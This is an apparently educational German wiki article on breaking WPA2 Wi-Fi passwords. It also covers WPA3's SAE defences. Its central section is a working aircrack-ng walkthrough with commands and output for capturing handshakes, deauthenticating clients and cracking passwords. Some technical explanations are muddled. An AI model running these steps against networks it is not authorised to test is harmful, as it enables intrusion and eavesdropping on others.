WPA2-Angriff
WPA2 ist ein Sicherheitsprotokoll zum Schützen drahtloser Heim- und Firmennetzwerke. Dabei wird durch WPA2 der gesamte Netzwerkverkehr, der mit dem Netzwerk verbundenen Geräte, verschlüsselt sowie weitere Vorkehrungen getroffen, sodass Angreifern das Eindringen in das Netzwerk erschwert wird. Der WPA2-Standard ist eine Erweiterung des Vorgängers WPA. Der Nachfolger des WPA2-Standards wird derzeit unter dem Namen WPA3 entwickelt.
Mit dem Entwurf des neuen WPA3-Standards wurden bei der Suche nach weiteren Angriffsmöglichkeiten Sicherheitslücken innerhalb des von WPA/WPA2 verwendeten 4-Way-Handshakes gefunden. [1] Dabei ermöglicht die Sicherheitslücke einen Brut-Force-Angriff auf das WLAN-Passwort des Zielrouters, sodass der Angreifer Internetzugang über den angegriffenen Router erhalten kann.
Neben den Brute-Force-Angriffe auf das WLAN-Passwort, kann auch eine Key Reinstallation Attack (KRACK) ausgeführt werden. Ein solcher Angriff ermöglicht es dem Angreifer, den Netzwerk-Verkehr des Angegriffenen zu entschlüsseln und somit den Inhalt der Pakete zu lesen. So kann der Angreifer sensible Informationen wie Benutzernamen, Passwörter, Bankverbindungen und ähnliches erhalten.
Geschichte
WPA2-Grundlagen
WPA2 stellt einen Sicherheitsstandard zur Verschlüsselungen des Netzwerkverkehrs in drahtlosen Netzwerken dar. Als Veschlüsselungsalgorithmus dient dabei der Advanced Encryption Standard (AES). Zudem wird das vom Vorgänger verwendete Temporal Key Integrity Protocol (TKIP) weiterhin unterstützt. Zusätzlich wird das Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) verwendet.
Zwei verschiedene Einsatzmodi werden durch WPA2 unterstützt. Zum einen den Personal Mode (WPA-PSK), welcher einen Pre-Shared Key (PSK) verwendet, im Allgemeinen auch als "WLAN-Passwort" bezeichnet, zum anderen den WPA Enterprise Mode, welcher einen Authentifizierungsserver zur Anmeldung im WLAN-Netzwerk verwendet.
Zur Kommunikation der im Netzwerk vorhandenen Clienten werden paarweise Schlüssel verwendet, d. h. symmetrische Verschlüsselungsverfahren. Dabei wird zwischen Schlüsseln für Unicast-Verbindungen (zwischen zwei Parteien) und Multicast-Verbindungen (zwischen mehreren Parteien) unterschieden. Als Grundlage dient der PMK, aus welchem alle weiteren zur Kommunikation verwendeten Schlüssel abgeleitet.
WPA-Modi
WPA2 unterstütz den WPA Personal Mode und den WPA Enterprise Mode. Beide Modi sind für unterschiedliche Anwendungszwecke ausgelegt. Hierbei ergibt sich eine Sicherheitlücke im WPA Personal Mode, die vermutlich in allen gängigen WLAN-Routern ausgenutzt werden kann.
WPA Personal Mode
Der Personal Mode verwendet zur Athentifizierung einen PSK. Dieser muss vor der Anmeldung eines Clienten am Access Point hinterlegt werden. Anschließend kann eine Verbindung mit dem Netzwerk über den entsprechenden PSK aufgebaut werden.
Dieser Modus ist zur Anwendung in privaten Netzwerken und für kleinere Unternehmen vorgesehen und enthält nicht alle für WPA2 spezifizierten Features. Auf Grund des einmalig etablierten Schlüssels besteht hier jedoch eine Schwachstelle. Diese kann durch Angreifer mit Brute-Force-Angriffen ausgenutzt werden, um das Zugangspasswort (den PSK) zu ermitteln.
WPA Enterprise Mode
Der Enterprise Mode ist zur Verwendung in großen Unternehmen
4-Way-Handshake
Brute-Force-Angriff
Mittels des Brute-Force-Angriffs versucht der Angreifer das Zugangs-Passwort eines WLAN-Netzwerks zu erhalten. Dazu muss der Angreifer lediglich einen EAPOL-Frame, d. h. eine Nachricht des 4-Way-Handshakes, der bei der Verbindung eines Gerätes mit dem Access Point (AP) durchgeführt wird, mitschneiden. Der Mitschnitt enthält dabei die PMKID, welche für den Angriff benötigt wird. Die PMKID setzt sich dabei wie folgt zusammen:
PMKID = HMAC-SHA1-128(PMK, ESSID | BSSID | MAC Client)
Wurden alle notwendigen Daten ermitellt, kann der Brute-Force-Angriff auf den PMK durchgeführt werden.
Angriff
Der Brute-Force-Angriff auf WPA/WPA2 lässt sich in drei Phasen unterteilen. Hierbei sind die ersten zwei Phasen im Netzwerk auszuführen, die dritte kann offline erfolgen. Im Folgenden werden die einzelnen Phasen des Angriffs erklärt.
- Informationen über den anzugreifenden Access Point sammeln (ESSID, BSSID, Channel).
- Einen EAPOL-Frame des 4-Way-Handshakes mitschneiden
- Deauthentifizierungs-Angriff
- Brute-Force-Angriff auf den mitgeschnitten 4-Way-Handshake
Um den Angriff erfolgreich ausführen zu können, muss zuerst der anzugreifende Access Point ausgewählt werden. Dazu muss die Netzwerkkarte des Angreifers in den Monitoring-Modus versetzt werden. Ist dies geschehen, kann der ESSID (Name) des Access Points, die BSSID (MAC-Adresse) des Access Points so wie der Channel (Funkkanal) ermittelt werden. Wurden die benötigten Informationen gesammelt, kann nun gezielt der Netzwerkverkehr zwischen dem Access Point und anderen Geräten abgehört werden.
Im zweiten Schritt wird mittels der zuvor gesammelten Informationen die Kommunikation des Access Points belauscht. Es muss solange gewartet werden, bis ein neues Gerät in das WLAN-Netzwerk aufgenommen und dadurch ein 4-Way-Handshake durchgeführt wird. Dabei muss mindestens ein EAPOL-Frame des 4-Way-Handshakes aufgezeichnet werden. Aus dem mitgeschnittenen EAPOL-Frame können nun alle für die Brute-Force-Attacke benötigten Informationen abgeleitet werden, dies sind die MAC-Adresse des Clienten, von dem aus die Authentifizierung erfolgte sowie die verwendete PMKID. Dauert es zu lange, bis sich ein neues Gerät mit dem AP verbinden möchte, kann ein Deauthentifizierungs-Angriff durchgeführt werden. Dabei wird über die Netzwerkkarte des Angreifers die Reauthentifizierung aller mit dem anzugreifenden AP verbundenen Geräte erzwungen. Es besteht bei diesem Vorgehen jedoch eine Chance, durch die Benutzer des Netzwerks bemerkt zu werden.
Im dritten Schritt wird der Brute-Force-Angriff durchgeführt. Folgende Informationen sind dazu notwendig:
- ESSID
- BSSID
- MAC Client
- PMKID
Es fehlt somit nur noch der verwendete PMK. Dieser PMK kann nun durch den Angriff erraten werden, indem mittels des oben vorgestellten Verfahrens zur Berechnung der PMKID versucht wird, eine Hash-Kollision zu finden. Wurde für einen geratenen PMK eine Kollision festgestellt, ist der Angriff beendet und das Zugangs-Passwort gefunden. Der Brute-Force-Angriff lässt sich, je nach Tool / Programmierung, auf mehrere verschiedene Weisen durchführen - als Wöterbuch-Angriff, als regelbasierter WörtebBuch-Angriff oder über reguläre Ausdrücke.
Angriffsarten
Wörterbuch-Angriff
Für den Wörterbuch-Angriff wird z.B. eine Passwortliste benötigt. Diese Listen enthalten durch Angriffe aller Art erhaltene Passwörter, welche durch reale Benutzer bei verschiedensten Diensten benutzt werden. Es wird nun jedes Passwort dieser Liste ausprobiert. Ist das Passwort in der Liste enthalten, kann ein effizienter Brute-Force-Angriff durchgeführt werden. Ist das Passwort jedoch nicht in der Liste enthalten, bleibt der Wörterbuch-Angriff erfolglos. Passwortlisten können online heruntergeladen, eine frei zugängliche ist z.B unter https://github.com/danielmiessler/SecLists/tree/master/Passwords zu finden. Als Alternative dienen auch Wörterbücher oder selbstgenerierte Listen.
Reguläre Ausdrücke
Einige Tools lassen die Verwendung von regulären Ausdrücken für Brute-Force-Angriffe zu. Hierbei muss mittels eines regulären Ausdrucks eine Vermutung über das Passwort angestellt werden, z.B. die Länge, die verwendeten Zeichen etc. Anschließend werden alle möglichen Kombinationen für den regulären Ausdruck berechnet. Dies ist für den Angreifer sehr rechenaufwändig, und kann gerade bei starken Passwörtern sehr lange dauern.
Regelbasierter Angriff
Der regelbasierte Angriff ist eine spezielle Art des Wörterbuchangriffs. Hierbei werden nach bestimmten Regeln Permutationen der in der Liste enthaltenen Passwörter generiert, welche ebenfalls als PMK probiert werden.
Wörterbuchangriff mit AirCrack unter Linux
Folgende Voraussetzungen sind für den Angriff notwendig:
- AirCrack installieren:
$ sudo apt install aircrack-ng
- Die WLAN-Karte muss den Monitor-Modus unterstützen. Dies kann mittels
$ iw list
getestet werden. Unter dem Punkt "Supported interfaces" sollte der Unterpunkt "monitor" für die zu verwendende Netzwerkkarte aufgeführt sein. - Es muss eine Passwortliste lokal vorhanden sein.
WICHTIG: Wurde die neueste Version von AirCrack aircrack-zc
installiert, sind die alternativen Kommandos für den Angriff zu verwenden, da ansonsten die Monitoring-Schnittstelle nicht vollständig geöffnet wird. Dies ist besonders relevant, wenn AirCrack auf einem neueren Ubuntu-basierten Betriebssystem verwendet wird.
Vorbereitung
Zuerst muss alles für den Angriff vorbereitet werden. Dazu muss die für den Angriff verwendete Netzwerkkarte in den Monitoring-Modus versetzt werden. Dazu kann wie folgt vorgegangen werden:
1. Ermitteln des Interface-Namens der Netzwerkkarte:
$ iwconfig eth0 no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=off Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:off lo no wireless extensions.
2. WLAN-Karte in den Monitor-Modus versetzen:
$ sudo airmon-ng start wlan0
Alternativ:
$ sudo airmon-zc start wlan0
AirCrack überprüft beim Ausführen des Befehls, ob Prozesse existieren, die das Aktivieren des Monitoring-Modus verhindern. Werden welche gefunden, fragt AirCrack, ob diese abgebrochen werden sollen. Diese Frage kann mit Y
bestätigt werden. Andernfalls kann auch
$ sudo airmon-ng check kill
verwendet werden und anschließend der Startbefehl erneut durchgeführt werden. Nun sollte die Netzwerkkarte in den Monitoring-Modus versetzt worden sein.
3. Überprüfen des Interfaces:
Nun sollte der Monitor-Modus abgezeigt werden. In diesem Beispiel ändert sich zudem der Interface-Name zu wlan0mon
.
$ iwconfig eth0 no wireless extensions. lo no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:off
Durchführung
1. Informationen sammeln
Zuerst müssen die benötigten Informationen über das anzugreifende Netzwerk gesammelt werden. Um eine Übersicht über alle empfangen Netzwerke zu bekommen wird folgender Befehl ausgeführt:
$ sudo airodump-ng wlan0mon CH 4 ][ Elapsed: 6 s ][ 2018-10-08 10:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 12:34:56:78:9A:BC -40 2 0 0 11 130 WPA2 CCMP PSK HackMe! 00:00:00:00:00:00 -41 2 0 0 11 130 WPA2 CCMP PSK FRITZ!Box Fon WLAN 11:11:11:11:11:11 -78 1 0 0 6 65 WPA2 CCMP PSK DIRECT-91-HP ENVY 22:22:22:22:22:22 -83 5 0 0 1 130 WPA2 CCMP PSK XT BSSID STATION PWR Rate Lost Frames Probe (not associated) 33:33:33:33:33:33 -90 0 - 1 0 1 GetOff (not associated) 44:44:44:44:44:44 -90 0 - 1 0 2 EasyBox
Alternativ:
$ sudo airodump-zc wlan0mon
Nachdem der anzugreifende Access Point gefunden wurde, kann das Programm mit Strg + C abgebrochen werden. Nun haben wir die ersten notwendigen Informationen über den anzugreifenden Access Point erhalten, in diesem Fall:
- BSSID: 12:34:56:78:9A:BC
- CH: 11
- ESSID: HackMe!
2. Mitschneiden des 4-Way-Handshakes
Nachdem nun alle notwendigen Informationen vorhanden sind, muss ein EAPOL-Frame des 4-Way-Handshakes mitgeschnitten werden. Dieser wird automatisch in einer .cap-Datei gespeichert.
$ sudo airodump-ng --bssid 12:34:56:78:9A:BC -c 11 --write Logdatei wlan0mon CH 11 ][ Elapsed: 1 min ][ 2018-10-08 11:02 ][ WPA handshake: 36:31:C4:E BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER 12:34:56:78:9A:BC -42 90 235 31 0 11 130 WPA2 CCMP BSSID STATION PWR Rate Lost Frames Prob 12:34:56:78:9A:BC 00:11:22:33:44:55 -48 1e-48e 139 33
Alternativ:
$ sudo airodump-ng --bssid 12:34:56:78:9A:BC -c 11 --write Logdatei wlan0mon
Wurde ein Handshake aufgenommen, erscheint oben rechts die Aneige [WPA handshake:
. Ist dies erfolgt, kann das Programm mit Str + C abgebrochen werden.
Wird lange Zeit kein neuer Client mit dem Access Point verbunden, kann eine Deauthentifizierungs-Attacke durchgeführt werden. Durch diese Art von Angriff werden alle bereits verbundenen Clienten dazu gezwungen, sich bei dem Access Point zu reauthentifizieren, was whs. zur Durchführung neuer Handshakes führt. Jedoch kann diese Art von Angriff durch den Benutzer bemerkt werden. Um den Angriff auszuführen, kann folgender Befehl verwendet werden:
$ sudo aireplay-ng --deauth 100 -a 12:34:56:78:9A:BC wlan0mon
3. Brute-Force-Angriff
Die im vorherigen Schritt erzeugte Logdatei-01.cap enthält nun einen EAPOL-Frame des 4-Way-Handshakes mit allen notwendigen Informationen (ESSID, BSSID, MAC Client und PMKID). Mit diesen Informationen kann der Brute-Force-Angriff durchgeführt werden, indem der fehlenden PMK geraten und das Ergebnis der Hashfunktion mit der PMKID verglichen wird. Sind diese identisch, wurde das Passwort gefunden. Die Ausgabe erfolgt in Plaintext.
$ sudo aircrack-ng Logdatei-01.cap -w /Pfad/Zur/Passwortliste.txt [00:00:00] 24/4799 keys tested (597.51 k/s) Time left: 7 seconds 0.58% KEY FOUND! [ 12345678 ] Master Key : CF 82 97 8B 37 2E 39 FE F5 73 95 59 45 A6 AE 01 1A C8 A3 A1 FA 61 3B AF EB 5E 85 E6 3B B7 89 5B Transient Key : 87 12 F7 00 02 E3 5D 1D C0 79 95 09 3E A7 C5 E4 48 3E B8 ED 01 28 A7 8A 2A F2 28 1D 6B 5D DA 71 A0 03 2E E5 4C C3 7A 9F 9F E3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EAPOL HMAC : AF 9C A2 71 13 BD 66 7E BD 02 CE F1 88 27 4B 08
Verbesserungen in WPA3
WPA3 ist der Nachfolger von WPA2. Er wurde Anfang 2018 angekündigt und soll 2019 in den ersten Geräten vorhanden sein. Dabei wurden einige Verbesserungen gegenüber WPA2 gemacht, die auch BruteForce Attacken wie der Offline Wörterbuch Angriff verhindern sollen. Dabei wird der WPA2 4-Wege-Handshake beibehalten aber ein SAE Handshake vorgeschoben. Der SAE Handshake etabliert dabei einen neuen Pairwise Master Key (PMK). Bei WPA2 ist der PMK für den 4-Wege-Handshake der zuvor geteilte statische Schlüssel (WLAN-Passwort).
Schritte des SAE Handshakes
Im folgenden sind die Schritte des SAE Handshakes
- Jede Seite wählt sich ein Passwort anhand der Parameter eigenen Identität, Identität des anderen, preshared Password, Random Seed.
- Jede Seite wählt 2 Zufallszahlen (rand und mask) und berechnet daraus ein Element elem und eine Skalenwert skal.
- Sende Element und Skalenwert an andere Seite.
- Berechne ein geheimes Element K aus eigenem rand, sowie ausskal und elem des anderen.
- Berechne aus K einen Intermediate Shared Key k.
- Berechne eine Authentication Confirmation Token aus k, eigenem scal und elem, sowie des skal und elem der anderen Seite. Sende das Token an den Kommunikationspartner.
- Berechne den Shared Key s aus: k, eigenem scal und elem, sowie des skal und elem der anderen Seite.
Relevanz für die gezeigten Angriffe
Eine wichtige Verbesserung von WPA3 gegenüber WPA2 ist die Tatsache, dass die gezeigten Angriffe nicht mehr möglich sein sollen.
- Abwehr gegenüber passiven Attacken: Der Angreifer ist nur in der Lage die Werte elem und scal mitzuschneiden. Dadurch bleiben rand und mask unbekannt. Diese beiden Werte zu erraten kommt dem Raten einer Zufallszahl nahe. Der Angreifer kann zwar versuchen Passworte zu raten, da aber die rand Werte von beiden Kommunikationspartnern dem Angreifer unbekannt sind wird das erraten des Passworts unmöglich.
- Abwehr gegenüber Dictionary Attacks: Um festzustellen ob ein Angriff erfolgreich war, benötigt der Angreifer eine Art Feedback. Für das Testen eines einzelnen Wörterbucheintrages muss der Angreifer jedoch auch einen aktiven Angriff machen. Rechenleistung ist also nicht von signifikantem Vorteil.
- Schutz bei schwachen Passwörtern: Auch wenn der SAE Handshake resistent gegenüber Wörterbuch Angriffen ist, ist die Passwortlänge ein Parameter der besseren Schutz es ermöglicht. Unabhängig von der Passwortlänge kann der Angreifer das Passwort nur erlangen durch wiederholte aktive Angriffe.
Key Reinstallation Attack (???)
Einzelnachweise
- [Heise, Angriff auf WPA | https://www.heise.de/security/artikel/Angriffe-auf-WPA-270596.html]
- [Security Insider, So knacken Sie WLAN-Verschlüsselungen | https://www.security-insider.de/so-knacken-sie-wlan-verschluesselungen-a-594587/]
- [Netspotapp, WiFi Encryption and Security | https://www.netspotapp.com/de/wifi-encryption-and-security.html]
- [Krackattacks, Key Reinstallation Attacks | https://www.krackattacks.com/]
- [New Attack on WPA/WPA2 | https://hashcat.net/forum/thread-7717.html]
- [Hashcat, Cracking WPA/WPA2 with hashcat | https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2]
- [ceilers-news, WLAN-Sicherheit 9 - Die Schlüssel von WPA2, Teil 1 | https://www.ceilers-news.de/serendipity/908-WLAN-Sicherheit-9-Die-Schluessel-von-WPA2,-Teil-1.html]
- [ Mathy Vanhoef, WPA3: Technical Details and Discussion | http://www.mathyvanhoef.com/2018/03/wpa3-technical-details.html]
- [D. Harkins, "Simultaneous Authentication of Equals: A Secure, Password-Based Key Exchange for Mesh Networks" | https://www.doi.ieeecomputersociety.org/10.1109/SENSORCOMM.2008.131]
<references/>